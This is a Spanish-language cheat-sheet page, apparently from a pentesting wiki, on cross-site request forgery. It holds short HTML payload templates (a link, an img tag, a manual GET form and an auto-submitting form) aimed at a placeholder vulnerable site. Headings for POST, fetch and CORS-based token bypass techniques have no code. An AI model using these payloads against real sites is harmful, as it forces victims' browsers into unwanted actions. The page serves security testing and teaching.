Cross-site request forgery (CSRF)
Same-origin policy (SOP) no permitirá que un atacante obtenga la respuesta del servidor a una solicitud maliciosa realizada desde otro origen, pero no previene la realización de peticiones desde otros orígenes. Esto significa que same-origin policy (SOP) no puede considerarse un mecanismo de seguridad contra ataques de cross-site request forgery (CSRF).
HTML GET con interacción de usuario
<a href="http://web-vulnerable.com/?param=CSRF">Haz clic aquí</a>HTML GET sin interacción de usuario
<img src="http://web-vulnerable.com/?param=CSRF">Formulario HTML GET con interacción de usuario
<form action="http://web-vulnerable.com" method="GET">
<input name="param" type="hidden" value="CSRF" />
<input type="submit" value="Haz clic aquí" />
</form>Formulario HTML GET sin interacción de usuario
<html>
<body onload="document.forms['csrf'].submit()">
<form action="http://web-vulnerable.com" method="GET" name="csrf">
<input name="param" type="hidden" value="CSRF" />
<input type="submit" value="Haz clic aquí" />
</form>
</body>
</html> Formulario HTML POST con interacción de usuario
Formulario HTML POST sin interacción de usuario
Una solicitud
Múltiples solicitudes
JavaScript fetch POST sin interacción de usuario
Alojar y servir página maliciosa.
Víctima visita página maliciosa.
Eludir tokens CSRF mediante configuraciones incorrectas de CORS
Última actualización
¿Te fue útil?